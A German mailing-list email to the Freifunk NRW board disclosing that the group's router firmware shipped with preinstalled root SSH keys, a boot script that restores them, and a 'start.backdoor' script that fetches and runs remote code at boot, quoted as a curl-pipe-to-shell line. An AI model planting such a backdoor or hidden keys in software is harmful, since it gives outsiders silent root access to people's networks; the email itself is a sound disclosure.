<div dir="ltr">Hallo Vorstand vom Verbund Freie Netzwerke NRW, Hallo Liste,<br>
<br>
da für mich in Frage kam bei einem Bekannten in Leverkusen einen
"HotSpot" von euch aufzustellen habe ich mir eure Firmware zum Test
selber Installiert.<br>
<br>
Die Firmware enthält von vorne herein mehrere ssh keys die vollen root
Zugang zu den Geräten (und damit dem gesamten lokalen Netzwerk)
ermöglichen, neben den privaten Schlüsseln von <a href="mailto:tobias@freifunk-nrw.de" target="_blank">tobias@freifunk-nrw.de</a>
und kevinolbrich@Kevins-MacBook-Pro.local werden mutmaßlich auch die
Schlüssel von Servern hinzugefügt: maintsb, maintrw1 und maintrw2.
Siehe:<br>
<a href="https://github.com/FF-NRW/Firmware/blob/master/authorized_keys.default" target="_blank">https://github.com/FF-NRW/Firmware/blob/master/authorized_keys.default</a><br>
<br>
Werden diese Schlüssel gelöscht, stellt sie ein Skript beim booten wieder her.<br>
<br>
Zudem startet der Knoten per default, zumindest bei jedem Bootvorgang,
beliebigen code, den er mit dem Skript /etc/freifunk/start.backdoor nach
lädt:<br>
<br>
ff-curl boot/$(cat /proc/sys/kernel/hostname) | sh<br>
<br>
Derartig konfigurierte Knoten wurden auch in mindesten einem Parteibüro
der Piraten aufgestellt. Es ist davon auszugehen, dass auch die andern
Knoten im Feld, Beispielsweise im Rathaus in Wermelskirchen über
derartiges verfügen:<br>
<a href="http://freifunk.liztv.net/batmap/51.141062277444036,7.214093533172478,18" target="_blank">http://freifunk.liztv.net/batmap/51.141062277444036,7.214093533172478,18</a><br>
<br>
Bei einer Durchsicht eures gits habe ich festgestellt, dass zumindest das Backdoor Modul inzwischen wieder entfernt wurde:<br>
<a href="https://github.com/FF-NRW/Firmware/commit/bd682a057894c6d06136a18378de66c640abc2c3" target="_blank">https://github.com/FF-NRW/Firmware/commit/bd682a057894c6d06136a18378de66c640abc2c3</a><br>
<br>
Allerdings vom selben User, der es im Juli 2014 implementiert hat:<br>
<a href="https://github.com/FF-NRW/Firmware/commits/87251c48cb68b82f67647b2fa182d1b045500268/files/default/etc/freifunk/start.backdoor" target="_blank">https://github.com/FF-NRW/Firmware/commits/87251c48cb68b82f67647b2fa182d1b045500268/files/default/etc/freifunk/start.backdoor</a><br>
<br>
Ich fordere den Vorstand des VfN auf die Angelegenheit zu klären und
sofern sie strafrechtlich relevant ist gegen die entsprechenden
Mitglieder Anzeige zu erstatten. Eine öffentliche Stellungnahme zur
vergangenen Praxis und dem zukünftigen Vorgehen halte ich für zwingend
notwendig!<br>
<br>
Vom Förderverein Freie Netzwerke e. V. wünsche ich mir eine klare
Distanzierung von derartigem Verhalten. Ich persönlich empfinde es als
unerträglich, dass ein Verein, der derartiges Verhalten von einem
Vorstandsmitglied duldet, von euch als Freifunk anerkannt wird.
Schlimmer, sich Freifunk NRW nennt und damit weitere Vereine in Verruf
zieht.<br>
<br>
Viele Grüße<br>
Malte Möller</div>